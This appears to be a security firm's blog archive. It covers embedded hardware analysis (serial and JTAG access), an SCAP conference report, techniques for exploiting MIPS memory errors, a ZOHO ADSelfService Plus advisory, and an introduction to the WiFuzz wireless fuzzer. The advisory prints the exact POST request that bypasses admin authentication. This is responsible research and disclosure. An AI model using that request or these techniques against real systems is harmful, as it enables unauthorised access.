Embedded hardware analysis primer

1 comments
An important part of security activities carried out at Emaze involves testing from a security point of view the hardware of embedded devices like routers, access points, or even more security-sensitive devices. The focus of this kind of analysis is to find out how to access the internals of the device under analysis, interact with the underline system, modify its behavior and extract data in ways not intended by its  normal functionality.
This can become a critical point if the device contains highly sensitive data which should not be available to the user (even if this is normally a sign there is something wrong in the design of the system, protocol or application!).

Most of these devices include a fairly powerful CPU (typically ARM or MIPS processor) with a discrete amount of RAM and  flash and they typically a Linux kernel which opens them to being hacked. We want to share here some basic information on how to proceed and which tools can be used in this process.

Inspect and open the case

So the first step is to inspect the device and find a way to gain access to internal board for analysis.
Before doing this inspect the case and carefully watch if there are interesting external interfaces like a serial port or test points which are accessible without opening the device. In the latter case you can try to apply the same techniques used after having gained access to the board.

Usually the case is held together with screws or a snap-in mechanism, so it can be easily opened using common tools like a screwdriver. A snap-in case instead can be opened using a knife or a sharp screwdriver (the snap tabs can be located normally in the middle and near the corners).

It can happen sometimes that you find "exotic" screws (they are called "security" screws and have some strange shape) that are used as a antitamper mechanism. If you don't have the related screwdriver available (search on google first!) a brute force approach can be used, especially if you don't need to return back the device intact (which usually applies for this kind of activity). In this case you can just drill or cut the case.

It is less common on this devices to find tamper detection mechanisms (micro-switches or other sensors)  which are meant not only to determine if a device has been tampered with but in some cases also to react. This is sometimes applied to avoid an attacker access sensitive data (like encryption keys) by erasing them or render the device non operational. One example is the famous IBM cryptographic coprocessor card: the key material is stored in a battery-backed RAM so that trying to gain access to the memory will result in power cut and data loss.

If you suspect (read the device documentation or warranty card, sometimes statements about tamper protection can be found) there is a protection mechanism in place a good route (unless you have more information available) is to have access to two devices. Sacrifice one and study the tamper protection to attack the second.  Anyway unless the device you are dealing with contains particularly sensitive data (like the above crypto card) it's really hard that the protection mechanism is particularly sophisticated.


Board inspection

Now that you have access to the board you can start the inspection task to understand its structure, chips used, found and identify "communication" interfaces. The objective is not to get a full schematic of the circuit (i.e., the exact interconnection between all components) but just to identify most components and determine their functionality to target further analysis.

Unless removed (to counteract reverse engineering the device) chips have a marking with the part number, vendor logo and/or name. Some devices (mostly CPUs) can have an heatsink glued (remove it gently with a sharp screwdriver) or bolted to the PCB (in this case trying to desolder it is not suggested to avoid breaking circuit board, better try to cut bolts with a grinding tool). With this information at hand we can search for datasheet on vendor site (or just google for it). It can happen that there are epoxy protected areas (a clear indication of a particularly sensitive device) which are not easy to inspect. One way is to try to heat the epoxy and then carefully remove it using a sharp tool (avoiding to damage underlying parts).

PCB with marked parts (CPU, flash, RAM)


Sometimes chip datasheet is not available unless you sign an NDA and buy out big stocks (in terms of millions of parts probably!), and only a brief description on vendor site can be obtained. This gives at least some information about part functionality.

For the devices mentioned in the introduction we expect to find at least the following parts:
  • CPU
  • RAM
  • Flash (parallel and/or serial)
and since our interest is to interact with the system and inspect firmware to search for vulnerabilities or modify it we are going to search for signs of interfaces that can give us this kind of access. The most common and useful for our goal are serial ports and JTAG interfaces.

Inspecting the board we search for PCB headers or header mounting holes; these are commonly where interface signals are brought out to the outer world. You can also find (expecially if no header or header mounting hole is found) test points which are PCB pads (sometimes gold plated or tinned) used during the testing phase and programming at production factory.

Test pads


Header (serial port)

To ease subsequent steps it is a good idea to identify ground and power supply signals. To do this disconnect power supply, identify ground on the PCB (for example metal shield of USB connector, PSU connector ground, etc) and use a multimeter to find pins connected to ground.

Do the same for power suppy: identify VDD pin (power supply) of an easy to probe chip for which you have the datasheet  and trace using the multimeter.

Having analyzed the board and gained some information from the components datasheet or information found on the Internet, we now try to find where interface signals are located.

If datasheet are available, we can trace part pins as done for ground and power supply following these steps:
  • Identify pins for the interface (serial port or jtag) from part datasheet
  • Locate them on chip package 
  • Put the multimeter probe on one pin 
  • Probe all identified points
This is doable if the part package has accessible pin (TQFP is an example) which is nowadays becoming a less common case. Most CPUs now are in BGA packages which means that connections from the die are below the package rendering them not easy to access. This kind of package has small solder spheres in a grid layout which are melted during soldering phase to connect to below PCB copper pads.

In this case we can use this technique for tracing signals: since the copper pad can be a via (a through hole path going to other PCB side) we can map the pins to the bottom side of the board and trace from there. If vias are protected with solder resist, they have to be gently scratched with a knife. A good lens is required during this process!

Another option which is applicable only to outer (respect to the package grid) signals is to build a probe with nichrome wire (used to build electric heating elements; a piece can be obtained from a non working hair dryer for example): tape a small piece of wire on multimeter probe and use it like a whisker pushing it below package. This is not easy of course and is prone to errors (since you will probably short circuit two solder balls) but with some trial it can be useful.

Of course it is not always required to performed this step (even if it will help in particularly difficult cases); as we see below for example a serial console can be identified in other ways.

Serial console

Serial port is commonly used in embedded systems as a communication interface to interact and control the device and since we are speaking of Linux based devices it is normally used as a system console. The console is also used by the bootloader (which initializes the system, loads the kernel from flash memory and boots it) so connecting to it will not only give system boot messages (and hopefully a system shell!) but also a way to interact with the boot process and possibly download/upload flash images. 

Beware that in some systems the serial port is not initialized by the bootloader (to avoid this kind of hacks) typically by checking a value stored in flash or other condition: at production factory the port is used for device testing and programming, after this phase the value is changed to disable output on the port. This makes impossible to find and interact with the system unless the condition is changed which requires first reversing the bootloader (which can be obtained by reading the flash as explained below) to understand how to enable the serial console.

The serial port is directly connected to the CPU UART pins so it doesn't have any RS232 level (i.e., the electrical  levels used to represent 0 and 1's) but uses cpu logic levels (near ground for 0, near VDD for 1 to simplify), so a level converter will be required. There are a lot around, be sure to select one that can work at you device VDD value. You can also find USB serial adapters which can be used (they just do not have the usual TTL to RS232 level conversion chip) or some cheap USB phone cable might be used (one example is Nokia CA-42 cable, clones are really cheap).

Using the previously gathered information, if UART pins were already traced, we can connect our level converter and using a terminal we can test different speed rates (common ones are 115200 and 9600) until we get something consistent. Power off and on the device in this process since normally the bootloader will start to spit out characters during boot.

If no pins have been traced one can try the same method by probing pins (before having controlled voltage levels to avoid damaging your serial adapter) but this can be a long process and prone to errors. The way is to probe pins with an oscilloscope (or a logic analyzer) and observe signal until a train of pulses which resembles a serial async signal is found. With a digital storage oscilloscope you can also measure pulse length and determine baud rate from it (e.g., 9600 baud has circa 1mS bit duration).

Missing the oscilloscope (it doesn't make sense to buy one just for one time search of a serial port) an Arduino board come to the rescue. Arduino is an easy to use and very cheap prototyping platform bases on AVR microcontroller which can be programmed just using the USB port. There are a lot of boards available (the design is open source and there are clones available) from different places. Since the microcontroller has an analog to digital converter, it can be used as a simple oscilloscope using the code and related PC application from xoscillo project. The speed of serial port signals is low enough to be sampled with this setup.

Once TXD (serial output signal from the CPU) is found permanently connect it and step to RXD. This is a little bit more tricky, the idea here is to send out characters (now that we have determined baud rate and can watch system output) and watch system behavior. In most cases echo is active so one will see the character sent back. To avoid damaging other input we suggest to put a resistor (1kohm can be fine) in series with the line (TXD from the adapter).

JTAG interface

JTAG is an industry standard interface which was designed to test circuit boards during production by providing a mean to probe non accessible connections. Given this characteristic it is used also for debugging system CPU (or other controllers) and to program flash devices. These are exactly the features that we want to have access for our purposes.

The JTAG interface uses a serial protocol with 4 wires: TCK - clock, TDO - data out, TDI - data in, TMS - test mode state (changes JTAG state machine). If more than one part has JTAG interface they can be daisy-chained cascading TDO and TDI (first chip TDO to second chip TDI for example). An adapter is required and there are a lot out there. We suggest to select one that can work with different logic levels, has protected lines and works with Urjtag (an open source jtag software) and OpenOCD.

If our CPU has a JTAG interface (which is highly probable), you can get access to debugging features of the processor itself, that we can leverage to alter firmware behavior (e.g., bypassing some security checks) and access the flash memory to read its contents (dump the firmware image for later analysis) or update them (upload a modified firmware image). As for the serial port case if JTAG signals information has been obtained we have mapped its pins and can connect the adapter to continue our work.
If the system has more than one chip with JTAG (it is common to have devices with FPGA on board and normally datasheets for FPGAs are available) it is also possible that they are daisy chained so we can have traced at least TCK, TMS and TDO or TDI so with some try and error we can find the missing signal and detect devices on the chain.

If there aren't any other options, we can try using standard pinout for JTAG headers. In this way one can map at least GND and VDD to the header and then compare with known pinouts. If a matching is found we can try to connect our JTAG adapter and try to detect chips on the chain.

If this fails or  no evident header is on the board there is a nice tool called JTAGEnum which tries to identify JTAG pins from a bunch of signals. It is an Arduino based (no surprise! Arduino is really an handly platform for hardware hacking) platform which exploting some characteristics of the JTAG interface tries to do the mapping trying possible pins combination. Remember to select an Arduino board that is compatible with you board logic levels (or interpose a level shifting adapter). After JTAGEnum has mapped JTAG signals wire you adapter and use JTAG software to continue your work.

It can happen that this process fails: take into account that some CPUs have ways to disable JTAG interface (like with fuse bits which are programmed once after factory testing/programming) or to disable debug functionality.

Conclusions

Hardware security and hacking is somehow a broad topic and requires knowledge of electronics, familiarity with hardware tools (soldering iron included) and embedded systems. This is just an introduction meant to give some ideas. Working on a well known device is a good starting point to get familiar with these topics.

Reportage from the 7th IT Security Automation Conference (ITSAC)

2 comments
Three weeks ago (October 31th - November 2nd) I had the privilege to attend the 7th ITSAC in Arlington (Crystal City, Virginia), hosted by the National Institute of Standards and Technology (NIST) in conjunction with the Department of Homeland Security (DHS), National Security Agency (NSA) and Defense Information Systems Agency (DISA). The conference was about Security Automation through the development of the Security Content Automation Protocol (SCAP). “Security automation leverages standards and specifications to reduce the complexity and time necessary to manage vulnerabilities, measure security and ensure compliance, freeing resources to focus on other areas of the IT infrastructure”. - http://www.nist.gov/itl/csd/7th-annual-scap-conference.cfm.Although the primary intended “clients” of these efforts are US Federal Agencies and Agencies IT providers (as required by White House Office of Management and Budget), this set of standards and procedures could be used in both the public and private sector, as well as by other governments and their associated infrastructures (along with some “adjustments” to meet national or local laws/regulations requirements), becoming a significant component of large information security management and governance programs. NIST encourages widespread support and adoption for the SCAP indeed.


In brief, what is SCAP?

SCAP is a suite of specifications that standardize the format and nomenclature by which software flaw and security configuration information is communicated, both to machines and humans. SCAP is a multi-purpose framework of specifications that support automated configuration, vulnerability and patch checking, technical control compliance activities, and security measurement ” from NIST SP800-126r2.

Why to adopt SCAP? “Organizations need to conduct continuous monitoring of the security configuration of each system... at any given time... to demonstrate compliance with various sets of security requirements... these tasks are extremely time-consuming and error-prone because there has been no standardized, automated way of performing them... the lack of interoperability across security tools...can cause delays in security assessment, decision-making, and vulnerability remediation” from NIST SP800-117.

The Conference

Definitely it was an amazing experience and a real honor for me to meet such great people and organizations, getting closer to (and exploring) the real world of SCAP one year after I started my own research on this subject here at eMaze's R&D Center in Trieste, Italy (where the SCAP is still widely unknown and unsupported at the moment). The most impressive thing for me has been to see how the US Government, as well as other well known Agencies, is actively and deeply involved in the development and improvement of the SCAP, how much they believe in it and how large is the consensus even in the military/intelligence community and not only. Amongst the attendees I have seen people from: Department of Defense (DoD), Space and Naval Warfare Systems Command (SPAWAR), US Army, US AirForce, Department of State, USCYBERCOM, USSTRATCOM, Office of Naval Intelligence, National Nuclear Security Administration (NNSA), Department of Justice (DoJ), Department of Energy (DoE), NASA and so on...

I have found even remarkable to see at an event like this the presence and interest on the subject by some US universities, and not only from US as far as I know. For example, Ms. Angela Orebaugh (Booz Allen Hamilton), that I had the pleasure to meet, wrote an article about the University of North Carolina at Charlotte (UNCC) which house the Cyber Defense & Network Assurability (CyberDNA) Center, too (http://www.arc.uncc.edu). Her article is featured in the last number of the IAnewsletter (freely available here: http://iac.dtic.mil/iatac/download/Vol14_No4.pdf), focused on Security Automation. Also many vendors like nCircle, McAfee, Symantec, Juniper, Cisco, eEye, Tenable, Microsoft, Redhat, EMC and so on, were at the conference.

The conference stressed how much money the adoption of SCAP allowed the US Government to save in these years (“reducing time AND money”), along with the concept of “near real-time” Continuous Monitoring (NIST SP800-137) as opposed to the “snapshot-in-time” model for example (“you must track anything”). To paraphrase a famous Lord Kelvin's quote: “We cannot improve what we cannot measure” but, as you know, it is not always so simple.


Measure Software Security

Sean Barnum (MITRE) in his presentation “Measure Software Security” made the point about the great difference between “to measure” and “to be measurable”, talking about the problem of integrating a new security solution with existing solutions and, consequently, why we need “Standardized Approaches and the application of Architecting Principles”.
It's not the standards but how you use them
For all the readers unfamiliar with the MITRE's view of security and measures, you have to know that they proudly sponsorize and maintain the “Making Security Measurable (MSM) initiatives to provide the foundation for answering today’s increased demands for accountability, efficiency, resiliency, and interoperability without artificially constraining an organization’s solution options”. - http://measurablesecurity.mitre.org



Risk Analysis and Measurement

“Risk Analysis and Measurement with CWRAF” by Richard Struse (DHS) and Steve Christey (MITRE) was another presentation that I appreciated very much. They made a clear and important distinction between “weaknesses” and “vulnerabilities” in the context of security automation and software assurance:
A (software) weakness is a property of software/systems that, under the right conditions, may permit unintended / unauthorized behavior
while
A (software) vulnerability is a collection of one or more weaknesses that contain the right conditions to permit unauthorized parties to force the software to perform unintended behavior (a.k.a. “is exploitable”)

Please note the absence of the word “mistake” in these definitions...
Nowadays we are able to identify vulnerabilities with CVE identifiers, to score their impact with CVSS metrics and to classify weaknesses thanks to the Common Weakness Enumeration (CWE). Some examples of CWE are:
  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
  • CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer
However, we would like a way to specify priorities based on business/mission risk. So, “How do I identify which of the 800+ CWE’s are most important for my specific business domain, technologies and environment? ”. To answer this question, MITRE provides the Common Weakness Risk Analysis Framework (CWRAF) - http://cwe.mitre.org/cwraf/index.html. Instead, the Common Weakness Scoring System (CWSS) allows us to answer the question: “How do I rank the CWE’s I care about according to my specific business domain, technologies and environment?”. - http://cwe.mitre.org/cwss/index.html.

Getting the Network Security Basics Right

In “Getting the Network Security Basics Right” by Paul Bartock (NSA) and Steve Hanna (Juniper), Mr. Bartock shared with us some lessons learned by the Agency (I guess They learned many, many other things) while Mr. Hanna talked about “Trusted Network Connect & SCAP Use Cases ”. These lessons, although described by short sentences (unsurprisingly), have deep implications in our world:
  • The optimal place to solve a security problem is ... never where you found it.Corollary: the information for the solution is never in the right form for the solution
  • If it is happening to you today, then ... something very much like it happened to someone else yesterday, and will happen to someone else tomorrow.
    Corollary: and you probably don’t know them
  • After you figure out what happened, there were ... plenty of signs that *could* have helped us prevent or manage this.Corollary: but not all the signs are in “cyberspace” or available to “cyber defenders” (this is the best one and the most subtly winking in my opinion. Can you “read between the lines”?)
  • Information Sharing is ... Over-rated!Corollary: until you think about Purpose, Content, Plumbing, and the Framework

NVD CPE Dictionary

“NVD CPE Dictionary Management Practices” by Christopher McCormick (Booz Allen Hamilton) was a for me very important presentation (due to part of my job here in eMaze). We have exchanged many emails in these last months, working hard together on the correctness of many CPE names contained within National Vulnerabilty Database (NVD) Data Feeds and the Dictionary itself (http://nvd.nist.gov). I wish to thank Chris for his professionalism, helpfulness and patience.His presentation started describing the history of the transition to the CPE at NVD, from a proprietary product naming to the implementation of the initial CPE support with CPE 2.1 until today, becoming the primary source of CPE names based upon the Dictionary (containing about 35000 CPE names at the moment). After describing the CPE Dictionary Management process, Chris introduced a demo of the new CPE Submission Interface on the NVD web site which greatly improves the management process of names within the Dictionary.
"Common Platform Enumeration (CPE) is a standardized method of describing and identifying classes of applications, operating systems, and hardware devices present among an enterprise's computing assets" from NIST IR-7695. For example, the following is a formal and standardized way to describe the ubiquitous Microsoft Windows XP SP3 (try to think how many times we have seen different documents/reports/advisories referring to the same platform using strings like "Windows XP Service Pack 3" or "Win XP SP3") :
cpe:/o:microsoft:windows_xp::sp3


OVAL 5.10

Jon Baker (MITRE) in his presentation “OVAL 5.10 Update” talked about the Open Vulnerability and Assessment Language, a community-developed open standard that enables automated assessment and compliance checking. The OVAL Language is an XML-based framework for making logical assertions about a system (further information: http://oval.mitre.org). “OVAL provides the low level system assessment capability ” and can be used to perform Vulnerability Assessment (eg. Credentialed Scan) and Configuration Management (Defining the desired configuration and monitoring systems), just to mention some OVAL's Use Cases.
 
Common Configuration Scoring System (CCSS)

Not necessarily all “unauthorized accesses/actions” derive from bad pieces of code. Often attackers can take advantage from improperly configured settings or misconfigurations (eg. Directory listing on a web server).
Before to take any step further thinking (or talking) about the automation of security checks on these settings, we need to be able to uniquely identify security settings and configurations. Similar to the CVE effort, the Common Configuration Enumeration (CCE) assigns a unique, common identifier to a particular security-related configuration issue. “CCE identifiers are associated with configuration statements that express the way humans name and discuss their intentions when configuring computer systems . In this way, the use of CCE Identifiers (CCE-IDs) as tags provide a bridge between natural language, prose-based configuration guidance documents and machine-readable or executable capabilities such as configuration audit tools”. - For further information see http://cce.mitre.org.

The following is an example of a standard CCE identifier which represents a configuration requirement:
CCE-4191-3 (RHEL 5): “The dhcp client service should be enabled or disabled as appropriate for each interface”.

Having a way to identify security configuration settings, the next step is to be able to “rank” the security impact of configuration choices in a system, as well as CVSS to score vulnerabilities (CVE) for example. With regard to this, Karen Scarfone (Scarfone Cybersecurity) introduced the Common Configuration Scoring System (CCSS), “A universal way to convey the relative severity of security configuration choices ” based on CVSS version 2, therefore a set of metrics and formulas . Ms. Scarfone highlighted the fact that CCSS is “Not a risk assessment solution ”. Why should we use CCSS? Basically because “Understanding security implications of each configuration option allows better risk assessment and sound decision-making ”.
Many others interesting subjects that I would like to share with you has been presented and discussed at the conference, like standards for Asset Identification, IF-MAP, XCCDF, CEE and EMAP, MAEC... but a blog post is not enough to cover and explain them all. Hopefully this post will be only the first one on the subject.


Exploiting MIPS embedded devices

5 comments
Several security activities here at Emaze involve embedded devices, such as routers, access points, web cams, and so on. Today these devices are widespread, as several manufacturers or content providers push to distribute embedded hardware peripherals to their customer. Unfortunately, the security level of such platforms is often questionable. In this post we focus on a specific category of security flaws, memory errors, we discuss their impact on embedded platforms and we give an overview of possible exploitation techniques and countermeasures.

Most of the devices we typically deal with are powered by MIPS or ARM processors. In the following we discuss only the security-relevant aspects of the big-endian 32-bit MIPS architecture, but most of the material applies to the ARM platform as well. We assume the reader is confident with the exploitation of memory errors on the Intel x86 architecture.


A glimpse at the MIPS architecture
MIPS is a RISC instruction set architecture (ISA) often used in broadband routers, network gateways, and other embedded devices. MIPS CPU can be booted both in big- and little-endian configuration. There exist 32- and 64-bit versions of this ISA, but the former is certainly more common in embedded systems. As mentioned above, in this blog post we focus on big-endian 32-bit MIPS architecture. In the next paragraphs we introduce some details concerning the MIPS ISA that are relevant for the exploitation of memory errors. For a comprehensive reference on MIPS, interested readers can refer to this book.

MIPS ISA
As MIPS is a RISC ISA, instructions have fixed length: every MIPS instruction is 4-byte long. On MIPS, 32-bit memory accesses must be 4-byte aligned, as a consequence instructions must be placed at 4-byte aligned memory locations, otherwise a hardware exception is risen by the CPU. Another fundamental aspect of MIPS is its pipelining architecture, and the impact of the pipeline on instructions execution. From a programmer (and attacker) perspective, the most important consequence is that, when a branch instruction is reached, the instruction after the branch will be executed before the target of the branch is reached. The instruction position immediately after a branch is called branch delay slot.

Calling convention
When a function is called, the first four parameters are passed through registers $a0 through $a3, and the remaining parameters are pushed on the stack. When the callee terminates, it stores the return value in register $v0 (also $v1 can be used for a second return value, but this is not very common). As we will deal with memory errors, an important point is where a function return address is stored. Differently from x86 architectures, when a function is called the return address is not pushed on the stack, as the architecture reserves a special-purpose register for it, namely $ra. However, since there is just a single instance of this register, the previous value of $ra must be saved somewhere, otherwise nested function calls would not be possible. For this reason, the compiler arranges the prologue of non-leaf functions (i.e., functions that in turn call other procedures) to save $ra on the stack, in order to be able to restore its original value in the epilogue. As a consequence, only the return address for the current function is stored in $ra, while the others are still on the stack. Lets see a very simple example by examining the following C program source:
int foo(int a, int b, int c, int d, int e)
{
    return a+b;
}

int main(int argc, char **argv)
{
    return foo(1, 2, 3, 4, 5);
}
The main() procedure invokes foo(), passing five arguments. The disassembly for main()  is shown in the next figure. Registers $a0 through $a3 are used to store the first four arguments, while the last one is pushed on the stack (addresses 0x00400640-0x00400644). As main() is not a leaf function (it invokes foo()), $ra value is saved during the prologue and restored in the function epilogue.


The assembly code of foo(), depicted in the next image, is really simple, but it highlights the use of branch-delay slots: foo() computes the sum of the first two parameters, but the addu instruction is placed right after the “jump to $ra” statement; despite  addu follows the branch statements, the execution of the former is completed before the target of the branch is reached.


Stack smashing protection
Embedded devices are not as protected against exploitation attempts as traditional systems, but they are not free from defenses. In this section we give a brief overview of existing stack smashing protections for MIPS systems, including address space layout randomization (ASLR), execution prevention (W^X) and stack canaries (SSP, in GCC jargon). In the following we focus on MIPS device running Linux, as it is the most widely adopted operating system for this class of devices.

Address space layout randomization
Linux randomizes the stack layout of MIPS processes since 2.6.23. Starting from kernel version 2.6.26, also the heap and shared libraries were randomized. To the best of our knowledge, PIE executables are not so common on MIPS, and even shared libraries are not randomized very often.

"W^X" protection
Briefly, architectures that implement the "W^X" (Write XOR eXecute) protection allow to mark specific memory pages as executable but not writable. This kind of protection is usually enforced for those section that could store user-controlled data (e.g., the stack). On Intel processors, this policy is enforced through the NX page protection bit. At the time of writing, we are not aware of any MIPS processor with hardware support for the "W^X" protection. However, considering the rapid diffusion of MIPS devices, it is probably just a matter of time before also these CPUs start to include something similar to the Intel NX bit.

Stack canaries
Canary protection is named SSP (Stack-Smashing Protection) in current GCC versions, and, for the MIPS architecture, is implemented starting from GCC 4.5. Besides being supported by the compiler, the SSP protection must also be supported by run-time libraries (uClibc supports SSP since 2004).

The next figure demonstrates how GCC 4.5 implements SSP on MIPS. The implementation is very similar to that on the x86 platform. The canary is loaded from the global variable __stack_chk_guard and stored on the stack next to function local variables (0x004003f0). Then, during function epilogue, __stack_chk_guard is compared with the current value of the canary stored on the stack (0x00400430); if the two values differ, then execution is aborted by calling __stack_chk_fail.


Exploitation
Overall, exploitation of memory error vulnerabilities on embedded devices is almost the same as on traditional (i.e., x86) architectures. However, several subtle details must be taken into account in order to build effective and reliable exploits. First of all, it should be considered that, when we deal with embedded devices we must usually focus on remote exploits, as it is not often the case that attackers can leverage a local access to the device. In addition, attacks that rely on brute forcing attempts and make the target process to crash when the exploit fails are typically not suitable for embedded systems: these devices often run a big, single-thread binary file which provides most of the application-level functionalities; if this process crashes, the whole device becomes unusable.

Memory alignment
As we already mentioned, branch targets must be 4-byte aligned.
On a MIPS Linux system, processes which perform unaligned control transfers will be terminated through a SIGILL signal. As an example, when exploiting a vulnerability that allows to overwrite a code pointer (e.g., a saved return address), the new value must be aligned on a word boundary.

ROP and MIPS
"Return oriented programming" (ROP) is a popular exploitation technique, that can be considered as an evolution of the traditional "return-into-lib(c)" strategy, proposed by Solar Designer back in 1997. In a nutshell, return oriented programming consists into borrowing existing code chunks (gadgets) from the virtual address space of a target process; each code chunk terminates with a control transfer instruction (CTI), and the stack layout is prepared so that these CTIs chain multiple chunks together. In the last years, ROP has demonstrated to be effective against NX and partial ASLR, and it has been also used as the basic building block for surgically precise exploitation techniques.

Obviously, ROP also applies to MIPS; however, two characteristics of the architecture complicate the exploitation. First, MIPS instructions are 4-byte long, and, due to memory alignment checks, it is not possible to jump in the middle of existing instructions. Secondly, branch delay slots must be kept in mind: even if a gadget terminates with a branch instruction, also the instruction next to the branch will be executed before control is transferred to the next code chunk. Overall, these complications may drastically reduce the number of useful code chunks available.

Cache coherence
MIPS CPUs have two separate caches: the instruction cache (I-cache) and the data cache (D-cache). As the names suggest, code and data are cached in the I-cache and D-cache, respectively. Once a cache is full, it is flushed, i.e., its content is written-back to main memory.
But why should caches affect exploitation? As an attack payload is typically handled by the application as data, it will be stored inside the D-cache. When the payload triggers the vulnerability and hijacks the application control flow, execution is transferred at the memory address of the shellcode. However, if the D-cache has not been flushed yet, shellcode would be still stored inside the D-cache, and not into main memory. As a consequence, the target application would execute whatever is located at the memory location where the attacker intended to store the shellcode, with unexpected consequences.

Attackers leverage on two different solutions to overcome this problem. The first solution consists into filling the D-cache to force the CPU to write-back the shellcode into main memory. This approach is very simple to implement, but it is not free from limitations: as MIPS caches can store several kilobytes of data,  the drawback of this approach is that the attacker must be able to inject a large amount of data into the address space of the target application in order to fill the D-cache. Unfortunately, this is not often the case.

A more effective and reliable solution consists in forcing the CPU to flush its caches. If the target system runs Linux, attackers can leverage the cacheflush system call to flush both the I- and D-caches. Exploitation is even easier if the vulnerable program is linked to the uClibc library, as it provides a cacheflush() function that can be invoked through ROP. 

Shellcode
Writing a MIPS shellcode is not as easy as one would expect: all instructions are 4-byte long, and is quite difficult to build a NULL-free sequence of instructions that spawns a shell. A simpler solution is to leverage an encoder to decode the core of the shellcode at run-time, such as the MIPS XOR encoder included in Metasploit. However, the Metasploit framework includes just a single MIPS shellcode (a TCP reverse shell). As a side note, it is worth considering that the Metasploit MIPS shellcode connects-back to a hardcoded IP address; we recently submitted to the developers a patch that addresses this issue.

Conclusions
A lot of research efforts have been put into the exploitation of memory errors, but most of these works focus on the x86 architecture, the most widely adopted computing platform. With the diffusion of embedded devices, researchers (and attackers) started to move their attention to these platforms. Today's embedded architectures introduce novel challenges for exploit developers, that are not found in desktop or server environments. Despite this fact, exploitation of memory error vulnerabilities is still possible, and is often made easier by the lack of proper software and hardware protection facilities.

ZOHO ManageEngine ADSelfService Plus Administrative Access

3 comments
Advisory Information
Title: ZOHO ManageEngine ADSelfService Plus Administrative Access
Release date: 11/10/2011
Last update: 11/10/2011
Credits: Roberto Paleari, Emaze Networks S.p.A.

Vulnerability Information
Class: Authentication issue, Administrative access
CVE: CVE-2011-3485

Affected Software
  • ADSelfService Plus 4.5 Build 4521
Previous versions are probably also vulnerable, but they were not checked.

Vulnerability Details
ManageEngine ADSelfService Plus is a web-based password management infrastructure for Microsoft Windows Active Directory environments.

By default a local administrative account is configured, named "admin". The administrative password is stored inside the local database in base64(md5(P|S)) form (P is the plain-text password, S is a password salt, and '|' is the string concatenation operator). In the default installation, password for user "admin" is also "admin", but the password can be changed after first login.

Unfortunately, due to a bug in the authentication procedure, malicious users can authenticate without knowing the current plain-text password value.

Normal logins are eventually performed through POST requests similar to the following:

POST /j_security_check HTTP/1.1
Host: ...
Content-Length: ...

j_username=user&j_password=pass&domainName=domain&DIGEST=captcha&AUTHRULE_NAME=ADAuthenticator&domainAuthen=true

However, due to a software defect, if a malicious user tries to log as the "admin" user and adds to the POST body an additional parameter named "resetUnLock" with value "true", then the application skips the password check (i.e., you can supply any password and login succeeds).

As an example, an attacker can issue the following POST request to authenticate as the "admin" user:

POST /j_security_check HTTP/1.1
Host: ...
Content-Length: ...

j_username=admin&j_password=any&domainName=domain&DIGEST=captcha&AUTHRULE_NAME=ADAuthenticator&domainAuthen=true&resetUnLock=true


Remediation
Zoho included a fix to address this issue in ADSelfService Plus Build 4522. Emaze would like to thanks D. Ashok Kumar, of the ManageEngine ADSelfService Plus team, for having coordinated the vulnerability handling process.

Report Timeline
  • 26/08/2011 - Initial vendor contact. Publication date set to September 20th, 2011.
  • 02/09/2011 - Vendor replied, asking for a phone contact number to discuss the details of the issue.
  • 03/09/2011 - Emaze asked to keep all the communication through e-mail, in order to keep track of the whole conversation. Publication date delayed to September 24th, 2011.
  • 06/09/2011 - Zoho answered, providing a GPG key to secure the communication.
  • 08/09/2011 - Emaze replied with the vulnerability details.
  • 15/09/2011 - Emaze asked to Zoho a status update about the vulnerability handling process.
  • 15/09/2011 - Zoho confirmed the vulnerability has been fixed, and the patch will be included in the upcoming ADSelfService Plus Build 4522 release. According to Zoho, the new product build should be released "in a couple of weeks".
  • 15/09/2011 - Emaze replied asking if the current publication date (September 24th) is still appropriate.
  • 20/09/2011 - Zoho asked to move the publication date after the first week of October.
  • 21/09/2011 - Emaze set a new publication date to October 7th, 2011.
  • 10/10/2011 - Zoho released ADSelfService Plus Build 4522, which fixes the security vulnerability.
  • 11/10/2011 - Public disclosure.

Copyright
Copyright(c) Emaze Networks S.p.A. 2011, All rights reserved worldwide. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.

Emaze Networks has updated ipLegion, its vulnerability assessment platform, to check for this vulnerability. Contact info@emaze.net to have more information about ipLegion.

Disclaimer
Emaze Networks S.p.A. is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.

Testing wireless access points

4 comments
Nowadays, wireless devices are ubiquitous. Despite the widespread diffusion of this technology,  the security of wireless systems still needs a thorough scrutiny, in particular at the 802.11 network stack level.

Today we introduce WiFuzz, a very simple but nifty tool for testing wireless access point (AP) devices. WiFuzz generates "fuzzy" 802.11 network packets to trigger corner-case errors in the AP 802.11 stack.


How it works?
WiFuzz is written entirely in Python, and leverages the Scapy library for packet generation. To use WiFuzz, the network card driver must support traffic injection. Moreover, the wi-fi interface must be put into "monitor mode"; as an example, with my NIC these commands do the job:
$ sudo rmmod iwlagn
$ sudo modprobe iwlagn
$ sudo ifconfig wlan0 down
$ sudo iwconfig wlan0 mode monitor
$ sudo ifconfig wlan0 up
Only two mandatory parameters are required before starting to fuzz: the fuzzer type, and the SSID of the target AP.

WiFuzz is somehow a "stateful" fuzzer: depending on the chosen fuzzer type, it first moves to a suitable 802.11 state before starting to fuzz the AP. As an example, 802.11 Association requests are fuzzed with the "assoc" fuzzer, that first moves to the "probed" state, then authenticates with the AP ("authenticated" state), and finally starts to fuzz Association packets. Available fuzzers are visible in the following screenshot.

WiFuzz help screen
Fortunately, state transitions are handled transparently by the tool, so you can just forget them ;-) For example, to fuzz the AP identified by the "TestMe" SSID the following syntax can be used:
$ sudo python wifuzz.py -s TestMe assoc
To detect AP crashes, WiFuzz periodically listens for Beacon frames from the target access point: if no Beacon is received, WiFuzz assumes the target has crashed, and a PCAP test case is generated to reproduce the crash. Test cases can be replayed using the wireply.py utility.

Use case
Here is a brief example of WiFuzz in action. In this scenario, we used WiFuzz to test the access point with SSID "TestMe".

$ sudo python wifuzz.py -s TestMe auth
Wed Sep 28 10:38:36 2011 {MAIN} Target SSID: TestMe; Interface: wlan0; Ping timeout: 60; PCAP directory: /dev/shm; Test mode? False; Fuzzer(s): auth;
Wed Sep 28 10:38:36 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
